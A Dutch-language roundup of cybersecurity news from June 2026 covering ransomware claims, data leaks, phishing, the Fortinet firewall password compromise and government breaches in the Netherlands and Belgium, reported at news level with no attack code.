Kredietbank Limburg, een gemeentelijke kredietbank die in Nederland diensten levert aan inwoners van onder meer Heerlen, Kerkrade, Landgraaf en Brunssum, is getroffen door een cyberaanval. Vanaf de systemen van de organisatie zijn frauduleuze e-mails verstuurd. Deze berichten probeerden ontvangers te verleiden tot het klikken op links of het delen van persoonlijke gegevens. Naar schatting zijn honderden cliënten mogelijk geraakt door dit incident.

De kredietbank richt zich op het ondersteunen van inwoners met schulden en financiële problemen, een demografische groep die bijzonder kwetsbaar is voor gerichte phishingpogingen. De organisatie heeft ontvangers van deze verdachte e-mails opgeroepen om uiterst alert te zijn. Zij adviseren dringend om niet op verdachte links te klikken en dergelijke berichten onmiddellijk te verwijderen uit hun inbox.

Het onderzoek naar de exacte omvang van de cyberaanval is nog gaande. Belangrijke vragen die nog beantwoord moeten worden, zijn of en welke persoonsgegevens of wachtwoorden zijn buitgemaakt door de aanvallers. Het nieuws over de aanval werd op 11 juni 2026 gemeld door zowel De Limburger als RTV Parkstad.

 

Bron: Kredietbank Limburg

12 juni 2026 | Accountant waarschuwde gemeente Epe jarenlang voor onveilige IT voorafgaand aan hack

De gemeente Epe is jarenlang herhaaldelijk gewaarschuwd door haar accountant over tekortkomingen in de beveiliging van haar informatietechnologiesysteem. Ondanks deze waarschuwingen heeft de gemeente onvoldoende maatregelen genomen om de situatie te verbeteren. Deze informatie is recentelijk naar buiten gebracht door regionale media, die zich baseren op eigen onderzoek.

Op 12 maart 2026 werd de gemeente Epe geconfronteerd met een cyberaanval, waarbij een aanzienlijke hoeveelheid bestanden van het computernetwerk werd gestolen. Een forensisch onderzoek, uitgevoerd door het Nederlandse securitybedrijf Eye Security, heeft vastgesteld dat in totaal 551.447 bestanden zijn buitgemaakt. Onder de gestolen documenten bevinden zich ook stukken met gevoelige informatie over inwoners van de gemeente.

Het college van burgemeester en wethouders van Epe heeft inmiddels gereageerd op de bevindingen en erkent dat de waarschuwingen van de accountant inderdaad aanwezig waren. Dit recente nieuws volgt op eerdere berichtgeving over het datalek bij de gemeente Epe, waarover de gemeente zelf eerder al informatie had gepubliceerd. Het incident benadrukt het belang van adequate opvolging van beveiligingsadviezen om de digitale integriteit en privacy van burgergegevens te waarborgen.

 

Bron: de Stentor

12 juni 2026 | Ziekenhuizen herstellen digitale toegang na cyberaanval op ChipSoft

Patiënten van diverse Nederlandse ziekenhuizen die gebruikmaken van de software van ChipSoft hebben weer toegang tot hun gegevens, en de uitwisseling van medische informatie tussen zorgverleners is hersteld. Veel ziekenhuizen, waaronder het Diakonessenhuis in de regio Utrecht, Meander Medisch Centrum in Amersfoort en het Martini Ziekenhuis in Groningen, melden dat hun digitale omgevingen weer bereikbaar zijn.

Dit herstel volgt op de ransomware aanval op zorgsoftwareleverancier ChipSoft, die op 7 april 2026 werd ontdekt. Na de ontdekking hadden ziekenhuizen uit voorzorg patiëntenportalen en digitale koppelingen offline gehaald om verdere verspreiding of schade te voorkomen. Naar schatting is tussen de 70 en 75 procent van de Nederlandse ziekenhuizen afhankelijk van de software van ChipSoft, wat de brede impact van het incident verklaart.

ChipSoft heeft eerder bevestigd dat bij de aanval persoonsgegevens van patiënten zijn gestolen, waaronder medische gegevens. Het bedrijf geeft echter aan te hebben voorkomen dat de gestolen data openbaar is gemaakt. Dit nieuwsbericht betreft een vervolg op de eerder gedekte ontwikkelingen rondom het ChipSoft-incident.

 

Bron: Skipr

13 juni 2026 | Belgisch bedrijf Consultic slachtoffer van 3AM ransomware

Het Belgische bedrijf Consultic, actief in de sector van zakelijke dienstverlening en te vinden via de website consultic.be, is op 12 juni 2026 getroffen door een ransomware aanval. Cybercrimeinfo ontdekte dat de verantwoordelijkheid voor deze aanval wordt geclaimd door de ransomware-groep 3AM.

De modus operandi van de 3AM-groep is consistent met de werkwijze die zij vaker hanteren. Naar verluidt worden bij hun aanvallen bedrijfsdata gestolen en vervolgens versleuteld. Hierna volgt doorgaans een eis tot losgeld in ruil voor het herstellen van de toegang tot de data en het niet publiceren van de gestolen informatie. De aanval op Consultic past in dit patroon.

 

Bron: Darkweb

13 juni 2026 | Belastingdienst meldt datalek bij AP wegens gebruik van Adobe Analytics

De Belastingdienst heeft een datalek gemeld bij de Autoriteit Persoonsgegevens (AP) na de vaststelling van ongeautoriseerd gebruik van Adobe Analytics in haar betaalomgeving. Deze trackingsoftware, die was geïmplementeerd op de websites van de fiscus, bleek gedragsgegevens van belastingbetalers zonder expliciete toestemming door te sturen naar Adobe. Na de ontdekking is de functionaliteit van de software per direct uitgeschakeld.

De aanleiding voor deze maatregel en de daaropvolgende melding bij de privacytoezichthouder was een recent online gepubliceerd artikel van onderzoeker Mick Beer. Beer bracht aan het licht hoe Adobe een scala aan informatie ontving over individuen die hun belastingaanslagen via de digitale kanalen van de Belastingdienst voldeden. De doorgestuurde informatie omvatte onder meer details over de specifieke vordering en de status van de geopende aanslag van de belastingplichtige.

De onthullingen in het artikel van Mick Beer zorgden voor maatschappelijke en politieke commotie, wat resulteerde in directe vragen in de Tweede Kamer. Als reactie hierop maakte de Belastingdienst woensdag bekend dat Adobe Analytics voorlopig was gedeactiveerd. Staatssecretaris Eerenberg van Financiën heeft de Tweede Kamer inmiddels per brief geïnformeerd over de officiële datalekmelding bij de AP.

In zijn communicatie aan de Kamer sprak de bewindsman zijn spijt uit over de ontstane situatie en bedankte hij onderzoeker Beer expliciet voor zijn bijdrage: "Ik ben dankbaar dat deze ethisch hacker de Belastingdienst hierop heeft gewezen." De Belastingdienst heeft naar aanleiding van de bevindingen van de ethisch hacker onmiddellijk een intern onderzoek gestart om de omvang en aard van het incident vast te stellen en om herhaling te voorkomen.

De staatssecretaris heeft aangekondigd de Tweede Kamer verder te zullen informeren over de ontwikkelingen in deze kwestie en de te nemen vervolgstappen. Op dit moment voert de Belastingdienst een inventarisatie uit naar de aanwezigheid van soortgelijke tooling op haar platforms en worden alle relevante documenten verzameld die in het kader van de Kamervragen zijn opgevraagd.

 

Bron: Belastingdienst | Bron 2: tweedekamer.nl

13 juni 2026 | Ziggo verliest door storing opgeslagen wachtwoorden van klanten

Ziggo heeft als gevolg van een storing de wachtwoorden verloren die klanten hadden opgeslagen in hun online wachtwoordmanager. De internetprovider, actief in Nederland, biedt klanten het programma Ziggo Safe Online aan, een dienst van antivirusbedrijf F-Secure, dat onder andere is voorzien van een online wachtwoordmanager. Eerder deze week meldden klanten op het forum van Ziggo dat hun wachtwoordkluis leeg was.

Een gedupeerde klant deelde op het forum: "Ik heb mijn PC weer aangemeld, nu kom ik er weer in maar al mijn wachtwoorden zijn weg! Echt heel raar en onacceptabel. Weet iemand hoe ik dit weer terug kan krijgen? Ik had qua wachtwoordmanagers al de keuze tussen deze van Ziggo/F-Secure en die van Proton Pass, maar heb dus blijkbaar de verkeerde keuze gemaakt. Ik blijf ook geen klant van Ziggo als dit niet wordt opgelost."

Een moderator van Ziggo reageerde op de meldingen en erkende de problemen: "Heel erg zuur dat je wachtwoordkluis leeg is nadat je je opnieuw moest aanmelden. Op dit moment spelen er inderdaad issues waarbij er ook sprake kan zijn van dat Safe Online onterecht gedeactiveerd is. Safe Online blijft werken op apparaten waar dit geïnstalleerd is, echter werken sommige functies niet meer zoals de wachtwoordkluis."

Tegenover De Telegraaf verklaarde een woordvoerder van Ziggo dat er een storing was bij Ziggo Safe Online, welke inmiddels verholpen zou zijn. "We vinden het vervelend als klanten hier hinder door hebben ervaren. Als gevolg van de storing kan een klein deel van onze klanten op dit moment geen gebruikmaken van hun Safe Online-diensten. Voor een deel van deze groep betekent dit ook dat de door hen opgeslagen wachtwoorden zijn verwijderd." Het exacte aantal klanten dat door de storing is getroffen, werd door de internetprovider niet bekendgemaakt.

De incidenten benadrukken het belang van het maken van kopieën van belangrijke gegevens en het niet uitsluitend vertrouwen op een enkele oplossing voor het beheer van gevoelige informatie, zoals wachtwoorden. Veel forumgebruikers wezen op het risico van afhankelijkheid van een dienst van derden (SaaS) en adviseerden het gebruik van lokale wachtwoordmanagers of handmatige versleutelde back-ups.

 

Bron: Ziggo

14 juni 2026 | Datalek bij Colruyt zou gegevens van ongeveer 100.000 klanten blootleggen

Via dagelijkse monitoring van het darkweb is een advertentie waargenomen waarin een crimineel beweert over een dataset te beschikken die zou toebehoren aan de Belgische retailgroep Colruyt. De verkoper claimt dat deze dataset gegevens van ongeveer 100.000 klanten omvat.

Een gedeeld voorbeeldbestand suggereert dat de dataset diverse klantgegevens bevat, waaronder klant-ID's, klantenkaartnummers, e-mailadressen, telefoonnummers, taalvoorkeuren, en marketingvoorkeuren voor zowel e-mail als sms. Ook tijdstempels van accountaanmaak en adresgerelateerde profielgegevens zouden deel uitmaken van de gelekte informatie. De structuur van de gegevens wijst er volgens de monitoring op dat deze afkomstig zijn uit een klantenkaart- of e-commerceomgeving van de supermarktketen.

Het is belangrijk te benadrukken dat de echtheid en de precieze herkomst van deze gegevens momenteel niet zijn geverifieerd. Er is tot op heden geen publieke bevestiging van Colruyt zelf over dit vermeende datalek. Mocht de claim echter waar blijken te zijn, dan kunnen criminelen de gestolen informatie misbruiken voor diverse kwaadaardige doeleinden. Denk hierbij aan het opzetten van gerichte phishingcampagnes om inloggegevens te ontfutselen, het overnemen van loyaliteitsaccounts, en het uitvoeren van social engineering aanvallen. Ook oplichting waarbij aanvallers zich voordoen als Colruyt, behoort tot de mogelijkheden.

Klanten van Colruyt worden daarom aangeraden om extra alert te zijn op onverwachte of verdachte berichten, met name die welke vragen om persoonlijke informatie, inloggegevens, of betalingen.

 

Bron: Cybercrimeinfo

16 juni 2026 | Nederlands bedrijf SigmaControl getroffen door ransomware

Het Nederlandse technologiebedrijf SigmaControl is recentelijk het slachtoffer geworden van een ransomware aanval, uitgevoerd door de cybercriminele groep die bekendstaat als 'thegentlemen'. De aanval werd ontdekt op 15 juni 2026. SigmaControl, met website sigmacontrol.eu, opereert in de technologiesector en wordt nu geconfronteerd met de gevolgen van deze digitale inbraak.

De ransomware groep thegentlemen heeft zich in de loop der tijd een reputatie verworven door hun agressieve tactieken, die doorgaans neerkomen op het stelen en vervolgens versleutelen van gevoelige bedrijfsdata. Na de succesvolle compromittering van systemen en de exfiltratie van data, eisen zij losgeld van hun slachtoffers in ruil voor het herstel van de versleutelde bestanden en het niet publiceren van de gestolen informatie. De details over de precieze impact van deze aanval op SigmaControl zijn op dit moment nog niet volledig bekend, maar de modus operandi van thegentlemen suggereert dat het bedrijf te maken heeft met zowel dataversleuteling als de dreiging van datalek.

Dergelijke aanvallen kunnen verlammende gevolgen hebben voor de bedrijfsvoering, variërend van langdurige systeemuitval en operationele verstoringen tot ernstige reputatieschade en financiële verliezen. Voor bedrijven in de technologiesector, zoals SigmaControl, kan het verlies van data of de onmogelijkheid om systemen te benaderen, leiden tot aanzienlijke operationele uitdagingen en mogelijke verstoringen van diensten aan klanten.

Cybercrimeinfo ontdekte de melding van deze aanval op het darkweb, waar ransomware groepen vaak hun slachtoffers claimen en bewijs van gestolen data presenteren. Dit incident onderstreept opnieuw de aanhoudende en evoluerende dreiging van ransomware voor bedrijven wereldwijd, en specifiek voor Nederlandse organisaties die zich in het vizier van georganiseerde cybercriminelen bevinden. Het benadrukt de noodzaak voor robuuste cyberbeveiligingsmaatregelen en een gedegen incidentresponsplan om de impact van dergelijke aanvallen te minimaliseren.

 

Bron: Darkweb

16 juni 2026 | Opgeheven domeinnamen concreet risico voor veiligheid organisaties

De Stichting Internet Domeinregistratie Nederland (SIDN), beheerder van .nl-domeinnamen, waarschuwt dat opgeheven domeinnamen een aanzienlijk risico vormen voor de veiligheid en reputatie van organisaties. Deze waarschuwing volgt op een recent datalek waarbij dergelijke verlopen domeinnamen een cruciale rol speelden.

Volgens de SIDN is het proces van het uitfaseren van domeinnamen vaak geen expliciet aandachtspunt voor securityteams binnen organisaties. Dit gebrek aan focus kwam recent aan het licht toen bekend werd dat verlopen domeinnamen van bewindvoerders leidden tot een datalek.

Een onderzoeker ontdekte in gelekte data van telecombedrijf Odido dat veel mensen nog steeds het e-mailadres van hun bewindvoerder gebruikten. Veel bewindvoerders zijn in de afgelopen jaren gefuseerd of overgenomen, waarna hun oude domeinnamen zijn opgezegd of verlopen. Door deze verlopen domeinnamen opnieuw te registreren, kon de onderzoeker gevoelige gegevens van cliënten ontvangen. Dit gaf toegang tot maar liefst 258 financiële dossiers.

Michiel Henneke van de SIDN benadrukt de lage technische drempel voor dit type incident. "Het opnieuw registreren van een opgeheven domeinnaam is een regulier proces en kost weinig. Technische kennis is niet vereist," stelt Henneke. Hij voegt eraan toe dat de impact ontstaat doordat systemen en gebruikers blijven vertrouwen op bekende e-mailadressen zonder aanvullende verificatie. "Het gaat hierbij niet om een directe inbraak, maar om onvoldoende beheer van bestaande middelen."

Henneke merkt op dat de oorzaken van dergelijke problemen vaak liggen in de organisatiesfeer. Het uitfaseren van domeinnamen wordt vaak niet als een securitytaak gezien en de verantwoordelijkheid hiervoor is in veel organisaties onduidelijk. Hierdoor kunnen afhankelijkheden in e-mailverkeer en diverse systemen buiten beeld blijven. De SIDN waarschuwt dat opgeheven domeinnamen een concreet risico vormen voor de veiligheid en reputatie van een organisatie, met directe gevolgen voor de vertrouwelijkheid van gegevens, zoals in het recente geval van de bewindvoerders.

 

Bron: SIDN

16 juni 2026 | Belgisch familiebedrijf Calipage Humblet getroffen door ransomwaregroep The Gentlemen

Het Belgische familiebedrijf Calipage Humblet, ook bekend als Papeterie Humblet, uit Herstal in de provincie Luik, is recentelijk vermeld als vermeend slachtoffer op de afpersingssite van de ransomwaregroep The Gentlemen. De melding van de vermeende aanval verscheen rond 15 juni 2026 op basis van darkweb monitoring. Het bedrijf, dat al vier generaties in familiehanden is en bestaat sinds 1910, levert een breed scala aan kantoorartikelen, schoolspullen, kopieerdiensten en kantoormeubilair aan zowel particulieren als bedrijven in de regio Luik.

De claim van The Gentlemen is vooralsnog onbevestigd, aangezien Calipage Humblet de aanval zelf nog niet publiekelijk heeft bevestigd.

De ransomwaregroep The Gentlemen, die door Microsoft wordt gevolgd onder de naam Storm-2697, heeft zich in 2026 ontpopt tot een van de meest actieve aanbieders van ransomware als dienst (RaaS). De groep heeft wereldwijd honderden slachtoffers geclaimd en staat bekend om haar methode van dubbele afpersing. Hierbij worden niet alleen de gegevens van het slachtoffer versleuteld, maar worden deze ook gestolen om extra druk uit te oefenen. De gestolen data wordt vervolgens gedreigd openbaar te maken indien het losgeld niet wordt betaald.

 

Bron: Darkweb

17 juni 2026 | Knab moet slachtoffer bankhelpdeskfraude 95.000 euro vergoeden

Knab is door het financiële klachteninstituut Kifid verplicht om een klant die het slachtoffer werd van bankhelpdeskfraude ruim 95.000 euro te vergoeden. De uitspraak volgt op een incident begin vorig jaar, waarbij de klant, die naast Knab ook een rekening bij een andere bank heeft, werd benaderd door een oplichter via haar vaste telefoon. De oplichter deed zich voor als medewerker van die andere bank.

Tijdens het gesprek instrueerde de oplichter de klant om het programma Quicksupport op haar mobiele telefoon te installeren. Vervolgens moest de klant haar bank app openen door een code in te vullen en een selfie te maken. Gedurende dit telefoongesprek werden er vijf betaalopdrachten aan Knab gegeven, gericht op betaalrekeningen van derden, met een totaalbedrag van meer dan 95.000 euro. Enkele van deze opdrachten hadden als omschrijving ‘aanbetaling aanbouw sere’ en ‘aankoop beton voor sere aanbouw’. Na het gesprek ontdekte de klant dat zij vermoedelijk was opgelicht. Haar dochter nam contact op met Knab, maar het bleek te laat om de gelden veilig te stellen.

De klant verzocht Knab om de schade te vergoeden, maar de bank weigerde dit, waarna de klant de zaak voorlegde aan het Kifid. De klant betoogde dat zij niet met de betalingstransacties had ingestemd. Volgens het Kifid ligt de bewijslast bij Knab om aan te tonen dat de transacties geauthenticeerd, correct geregistreerd en geboekt waren, en niet beïnvloed door een technische storing of ander gebrek. Het klachteninstituut oordeelde dat Knab dit bewijs niet heeft geleverd.

Knab overlegde voor elke van de vijf betalingstransacties een A4-tje met een foto van het gezicht van de consument, vergezeld van een tijdstip en een datum. Het Kifid merkte op dat deze tijdstippen en datums niet exact overeenkwamen met het moment van de betalingen en getypt leken te zijn, waardoor niet kon worden afgeleid dat de gegevens rechtstreeks uit de administratie van de bank kwamen. Hierdoor werden de vijf betalingstransacties aangemerkt als niet toegestaan.

Verder stelde Knab dat de klant opzettelijk of met grove nalatigheid de veiligheidsregels in de algemene voorwaarden niet had nageleefd. Ook dit achtte het Kifid onbewezen. Knab beweerde dat de klant en de bank de algemene voorwaarden van 2025 waren overeengekomen. De klant stelde echter dat zij haar rekening in 2022 had geopend en toen niet kon hebben ingestemd met een versie uit 2025, noch op een later moment. Het Kifid oordeelde dat Knab niet kon bewijzen welke specifieke versie van de algemene voorwaarden was overeengekomen. Een document uit de administratie van Knab, waarin stond “Has Approved Terms And Conditions : true” en “Created On : 21/01/2022”, gaf geen uitsluitsel over de specifieke versie.

Als gevolg hiervan kon niet worden getoetst of de klant opzettelijk of met grove nalatigheid de regels voor het gebruik van haar rekening niet had nageleefd. De niet toegestane betalingstransacties komen hierdoor voor rekening van Knab. De bank is opgedragen om het bedrag van 95.450 euro, inclusief wettelijke rente, binnen vier weken te vergoeden.

 

Bron: Kifid

17 juni 2026 | Amsterdams streetwearmerk Patta vermeld als slachtoffer van ransomwaregroep LockBit 5.0

Het Amsterdamse mode en streetwearmerk Patta is op de afpersingssite van de ransomwaregroep LockBit 5.0 vermeld als slachtoffer.  Patta, opgericht in 2004 in Amsterdam, heeft zich ontwikkeld van een lokale sneakerwinkel tot een internationaal mode en lifestylemerk met meer dan zeventig medewerkers en vestigingen in onder meer Amsterdam, Milaan en Londen.

LockBit staat bekend als een van de prominentste aanbieders van ransomware als dienst (RaaS). Bij aanvallen van deze aard versleutelen criminelen doorgaans de systemen van een getroffen organisatie en stelen zij gevoelige gegevens. Vervolgens wordt losgeld geëist, vaak onder dreiging van openbaarmaking van de gestolen informatie indien niet aan de eisen wordt voldaan. Een vermelding op de afpersingssite van LockBit duidt er doorgaans op dat de groep claimt gegevens te hebben buitgemaakt.

Begin 2026 werd versie 5.0 van de LockBit ransomware waargenomen, die zich specifiek richt op systemen met Windows, Linux en ESXi besturingssystemen. Het bedrijf Patta heeft de aanval zelf nog niet publiekelijk bevestigd, waardoor de claim van de ransomwaregroep vooralsnog als vermeend moet worden beschouwd.

 

Bron: Darkweb

18 juni 2026 | Wachtwoorden 74.000 Fortinet-firewalls gekraakt, Nederlandse slachtoffers

Cybercriminelen hebben naar verluidt de wachtwoorden van 74.000 Fortinet-firewalls gekraakt en bieden de verkregen toegang momenteel aan op internet. Beveiligingsonderzoekers waarschuwen voor de ernst van de situatie, aangezien Nederlandse organisaties, waaronder onderwijsinstellingen en overheidsinstanties, tot de vermeende slachtoffers behoren. Deze claim is afkomstig van cybersecuritybedrijf Hudson Rock, dat de details in een blogpost heeft gedeeld.

Volgens Hudson Rock slagen de aanvallers erin om actief 'SSL VPN authentication hashes' te onderscheppen. Deze hashes worden vervolgens gekraakt met behulp van een krachtig cluster van 45 GPU's. Zodra de criminelen toegang hebben, is hun doel om door te dringen tot interne Active Directory-omgevingen om zo verdergaande controle over de netwerken te verkrijgen. Hudson Rock vermeldt dat diverse bekende bedrijven en organisaties zijn getroffen, waaronder grote namen als Samsung, PwC, Lenovo, Siemens, Accenture en Oracle. Het bedrijf benadrukt specifiek dat ook Nederlandse entiteiten zijn gecompromitteerd.

De authenticiteit van de gestolen inloggegevens die op internet worden aangeboden, is bevestigd door de Britse beveiligingsonderzoeker Kevin Beaumont. Hij stelt dat de data echt is en dat aanvallers op een nog onbekende wijze de configuratie van Fortinet-firewalls kunnen dumpen, waarna de wachtwoordhashes gekraakt worden. Door deze gecompromitteerde inloggegevens kunnen aanvallers remote toegang krijgen tot zowel de firewall als het achterliggende netwerk.

Beaumont heeft later meer informatie over de aanvallen gepubliceerd. Hij merkt op dat Fortinet sinds ongeveer een jaar het PBKDF2-algoritme gebruikt voor het hashen van wachtwoorden, wat het kraken aanzienlijk moeilijker maakt. Echter, deze nieuwe hashingmethode wordt door de firewall alleen toegepast als beheerders na het installeren van de updates ook daadwerkelijk hebben ingelogd. Dit betekent dat veel Fortinet-firewalls mogelijk nog steeds wachtwoorden via SHA-256 met een salt hebben opgeslagen. Deze oudere methode maakt de gemaakte hashes kwetsbaar voor bruteforce aanvallen, aldus Beaumont. De precieze methode om de firewallconfiguratie te dumpen blijft onbekend.

 

Bron: Hudson Rock | Bron 2: infostealers.com

19 juni 2026 | Ministerie van Financiën gehackt via zerodaylek

Het Nederlandse Ministerie van Financiën is afgelopen maart getroffen door een geavanceerde cyberaanval die misbruik maakte van een zerodaykwetsbaarheid. Deze kwetsbaarheid bevond zich in de software die de toegang tot de werkplekomgeving van het ministerie regelt. Minister Heinen van Financiën heeft de Tweede Kamer hierover geïnformeerd en aangegeven dat er waarschijnlijk gegevens van medewerkers zijn buitgemaakt.

De inbraak werd op 19 maart ontdekt door het Security Operations Center (SOC) van het ministerie, toen zij constateerden dat een aanvaller toegang had verkregen tot een deel van de ict-systemen. Uit nader onderzoek bleek het te gaan om een geavanceerde aanval waarbij een tot dan toe onbekende kwetsbaarheid, een zogenaamde zero-day, werd benut. Voor deze kwetsbaarheid bestonden op het moment van de aanval nog geen beveiligingsupdates.

De leverancier van de getroffen software is inmiddels op de hoogte gesteld van de kwetsbaarheid en heeft maatregelen getroffen. Alle klanten van de softwareleverancier zijn op 27 maart geïnformeerd over de situatie. Specifieke details over de naam van de software zijn echter niet openbaar gemaakt.

Hoewel de tijdige maatregelen hebben voorkomen dat de systemen van het ministerie schade opliepen, is het volgens minister Heinen wel aannemelijk dat er gegevensdiefstal heeft plaatsgevonden. De betrokken medewerkers zijn geïnformeerd over de mogelijke impact en krijgen begeleiding om de gevolgen van het lek zo veel mogelijk te beperken. Vanwege de geavanceerde aard van de inbraak wordt het onwaarschijnlijk geacht dat de exacte gestolen bestanden of de identiteit van de verantwoordelijke aanvallers kunnen worden achterhaald.

In reactie op het incident zal het Ministerie van Financiën zich de komende periode richten op het verder uitbouwen en professionaliseren van het team dat verantwoordelijk is voor het monitoren, detecteren, loggen en afhandelen van digitale dreigingen en incidenten. Daarnaast zullen periodieke penetratietesten, crisisoefeningen en onderzoeken naar kwetsbaarheden worden uitgevoerd om de digitale weerbaarheid te versterken.

 

Bron: Ministerie van Financiën | Bron 2: dutchitchannel.nl | Bron 3: tweedekamer.nl

20 juni 2026 | Dark Storm Team claimt DDoS aanvallen op Belgische overheidswebsites

Het Dark Storm Team claimt verantwoordelijkheid voor gerichte Distributed Denial of Service (DDoS) aanvallen op diverse Belgische overheidswebsites. Deze beweringen, opgemerkt door de darkweb monitoring van Cybercrimeinfo, suggereren dat meerdere cruciale online diensten van de Belgische overheid het doelwit zijn geweest van de dreigingsactor.

Volgens de claims van het Dark Storm Team zijn de volgende organisaties getroffen:

*   De dienst Verkiezingen van de FOD Binnenlandse Zaken, verantwoordelijk voor de organisatie en het beheer van verkiezingen in België.

*   De Autoriteit voor Financiële Diensten en Markten (FSMA), die toezicht houdt op de Belgische financiële markten en consumenten beschermt.

*   De Kruispuntbank van de Sociale Zekerheid (KSZ-BCSS), een centraal knooppunt voor de uitwisseling van sociale zekerheidsgegevens.

*   De Rijksdienst voor Arbeidsvoorziening (RVA), die zich bezighoudt met werkloosheidsuitkeringen en arbeidsbemiddeling.

*   Het Federaal Agentschap voor Nucleaire Controle (FANC), dat toeziet op de nucleaire veiligheid en stralingsbescherming in België.

DDoS aanvallen zijn ontworpen om websites en online diensten onbereikbaar te maken door ze te overspoelen met grote hoeveelheden internetverkeer. Hoewel het Dark Storm Team de verantwoordelijkheid voor deze aanvallen claimt, is het belangrijk op te merken dat de status van deze claims en de daadwerkelijke impact op de genoemde websites onafhankelijk geverifieerd moeten worden. De motivatie achter de aanvallen is niet gespecificeerd in de claims.

 

Bron: Darkweb

20 juni 2026 | NCSC waarschuwt Nederlandse organisaties voor gelekte Fortinet-wachtwoorden

Het Nationaal Cyber Security Centrum (NCSC) heeft diverse organisaties in Nederland geïnformeerd over gelekte wachtwoorden die behoren tot hun firewalls of VPN-gebruikers. Deze waarschuwing volgt op de bekendmaking afgelopen woensdag dat inloggegevens van circa 74.000 Fortinet-firewalls en VPN-gateways in handen zijn gekomen van cybercriminelen en nu online worden aangeboden.

Het NCSC benadrukt dat de volledige omvang van deze campagne nog onduidelijk is, wat betekent dat mogelijk nog niet alle getroffen organisaties zijn bereikt. Daarom roept de overheidsinstantie organisaties op om proactief te controleren of hun gegevens voorkomen in de reeds bekende datasets. Het NCSC verwijst daarbij naar de website van cybersecuritybedrijf Hudson Rock, dat een overzicht heeft gepubliceerd van gecompromitteerde organisaties.

Omdat niet per organisatie is vastgesteld welke vervolgactiviteiten na de initiële toegang hebben plaatsgevonden, kan het NCSC geen specifieke indicatie geven over de mate waarin een organisatie is getroffen. Organisaties wordt geadviseerd om een eigen risico- en impactanalyse uit te voeren. Belangrijke controlepunten hierbij zijn het nazien van logs en het controleren op de aanwezigheid van verdachte accounts.

Internationaal zijn vergelijkbare waarschuwingen en adviezen uitgegeven. Het Australische Cyber Security Centre (ACSC) adviseerde Fortinet-klanten eerder al om alle admin- en VPN-wachtwoorden te wijzigen. Dit advies wordt gedeeld door het Cybersecurity and Infrastructure Security Agency (CISA) van het Amerikaanse ministerie van Homeland Security. Het Britse National Cyber Security Centre (NCSC) gaat nog een stap verder en adviseert zelfs een fabrieksreset van het apparaat van Fortinet, omdat het enkel aanpassen van inloggegevens mogelijk onvoldoende is om aanvallers volledig van het systeem te verwijderen.

 

Bron: NCSC

21 juni 2026 | LockBit 5 zet Nederlandse accountantsorganisatie SRA op darkweb leaksite

De Nederlandse organisatie SRA, een branchevereniging die accountants- en advieskantoren ondersteunt, is op 20 juni 2026 toegevoegd aan de darkweb leaksite van de ransomwaregroep LockBit 5. De cybercriminelen dreigen hiermee gestolen gegevens van SRA openbaar te maken, wat een aanzienlijke impact kan hebben gezien de aard van de organisatie.

Het incident kwam eerder in het voorjaar van 2026 aan het licht en omvatte de mogelijke toegang van onbevoegden tot inactieve bestandsservers van SRA. Deze servers waren reeds in januari 2026 offline gehaald en bevatten historische data die betrekking heeft op de periode van 2023 tot en met 2025. SRA heeft destijds aangegeven dat de dagelijkse dienstverlening van de organisatie niet geraakt werd door deze inbreuk.

Na de ontdekking van de mogelijke inbreuk heeft SRA direct een crisisteam samengesteld en zowel externe forensische als juridische experts ingeschakeld om de situatie grondig te onderzoeken en de gevolgen te beheersen. De recente verschijning van SRA op de LockBit 5 leaksite duidt erop dat de aanvallers nu overgaan tot het verkopen of publiceren van de buitgemaakte data, die mogelijk gevoelige informatie van de aangesloten accountants- en advieskantoren kan bevatten.

Het is van belang te vermelden dat deze claim van verantwoordelijkheid, afkomstig van de afperser zelf, nog niet onafhankelijk is bevestigd door SRA of externe onderzoekers. De situatie wordt nauwlettend gevolgd door de cybersecuritygemeenschap en relevante instanties.

 

Bron: Cybercrimeinfo screenshot darkweb

21 juni 2026 | Vermeende verkoop dataset met zeven miljoen Nederlandse consumenten op darkweb

Op een ondergronds cybercrimeforum is een grootschalige dataset te koop aangeboden die naar verluidt meer dan zeven miljoen records van Nederlandse consumenten bevat. Volgens de informatie van de verkoper omvat de dataset voornamen, initialen, achternamen, Nederlandse tussenvoegsels, geslacht, geboortedatum, e-mailadressen, vaste en mobiele telefoonnummers, straatnamen, huisnummers, postcodes, gemeenten, provincies en woonlocaties.

De manier waarop de data is samengesteld, doet vermoeden dat het een geaggregeerde consumenten- of marketingdatabase betreft en niet het resultaat van een inbraak bij één specifieke organisatie. De claims van de actor zijn op dit moment niet onafhankelijk geverifieerd en er is geen duidelijke bron of slachtofferorganisatie genoemd die de gegevens zou hebben gelekt. Desondanks vormt de combinatie van persoonsgegevens zoals naam, adres, geboortedatum en telefoonnummer een aanzienlijk risico. Een dergelijke dataset is uitermate geschikt voor grootschalige phishingcampagnes, identiteitsfraude en gerichte oplichting van Nederlandse burgers.

 

Bron: Cybercrimeinfo

21 juni 2026 | Belgische Staatsveiligheid getroffen door cyberaanval via lek bij externe leverancier

De Belgische Staatsveiligheid, de civiele inlichtingendienst van België, is het slachtoffer geworden van een cyberaanval. Dat werd op 20 juni 2026 bekend. Volgens de berichtgeving speelde het incident zich af tussen mei 2025 en het voorjaar van 2026.

Het lek zat niet bij de Staatsveiligheid zelf, maar bij Ivanti, een Amerikaans bedrijf dat meewerkt aan de beveiliging van de communicatie. Tijdens een inspectie van de digitale infrastructuur werd ontdekt dat er een softwarelek was waar criminelen misbruik van hebben gemaakt.

Via dat lek kregen de aanvallers toegang tot persoonsgegevens, telefoonnummers en e-mailadressen van medewerkers. Daardoor zijn mogelijk namen, achternamen en telefoonnummers van agenten van de dienst buitgemaakt.

Belangrijk is dat de aanvallers voor zover bekend geen toegang hebben gekregen tot het interne netwerk van de Staatsveiligheid. Daar wordt de meest gevoelige en geheime informatie uitgewisseld. Wie er achter de aanval zit en wat er met de mogelijk gestolen gegevens is gebeurd, is nog niet duidelijk.

Het incident laat zien hoe een kwetsbaarheid bij een externe leverancier ook de best beveiligde organisaties kan raken. Zelfs een inlichtingendienst is afhankelijk van de veiligheid van zijn toeleveranciers.

Bron: VRT NWS

22 juni 2026 | Vermeend datalek bij Belgisch platform Agenda.be, gegevens van 15.372 gebruikers te koop

De actor claimt dat deze dataset afkomstig is van Agenda.be, het officiële cultuur- en evenementenplatform van de stad Brussel. Volgens de beweringen van 'misere' bevat de dataset gegevens van 15.372 gebruikers en wordt deze aangeboden als een CSV-bestand.

